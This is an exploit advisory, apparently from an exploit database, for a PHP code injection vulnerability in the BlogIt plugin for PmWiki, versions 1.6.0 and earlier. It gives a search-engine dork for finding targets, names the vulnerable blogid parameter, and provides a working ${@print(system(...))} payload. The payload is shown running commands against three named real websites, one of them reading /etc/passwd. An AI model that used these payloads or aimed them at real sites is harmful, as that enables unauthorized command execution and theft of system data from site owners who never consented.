=================================================================== BlogIt <= 1.6.0 Php Code Injection Vulnerability =================================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Ux0r #[+] E-mail : ux0r@live.com #[+] Home : http://ux0r.blogspot.com ~ http://mavi1.org #[+] Message : Benim eski indekslerin üzerine yazmaya çalýþan lamerlere selam olsun. Beni güldürdünüz :) Product : BlogIt Version : <= 1.6.0 Site : http://www.pmwiki.org/wiki/Cookbook/BlogIt Dork : "powered by blogIt" = Error in file Site.BlogList = Error code: (Line 11) text=(:includesection "#blog-yearly-archive-pagelist blogid={(bi_ifnull '{$bi_BlogId}' blog1)} status=publish,sticky":) A vulnerable parameter $bi_BlogId = Exploit = - http://site.com/path/Site/BlogList?blogid=${@print(...)} ; ... => php code injection = Example = - http://site.com/Site/BlogList?blogid=${@print(system('ls -la'))} = Live examples = - http://schniertshauer.com/Site/BlogList?blogid=${@print(system('ls -la'))} - http://dotdelimited.com/Site/BlogList?blogid=${@print(system('pwd'))} - http://tognela.net/Site/BlogList?blogid=${@print(system('cat /etc/passwd'))} < Esenlikler dilerim. 2 bin 11 >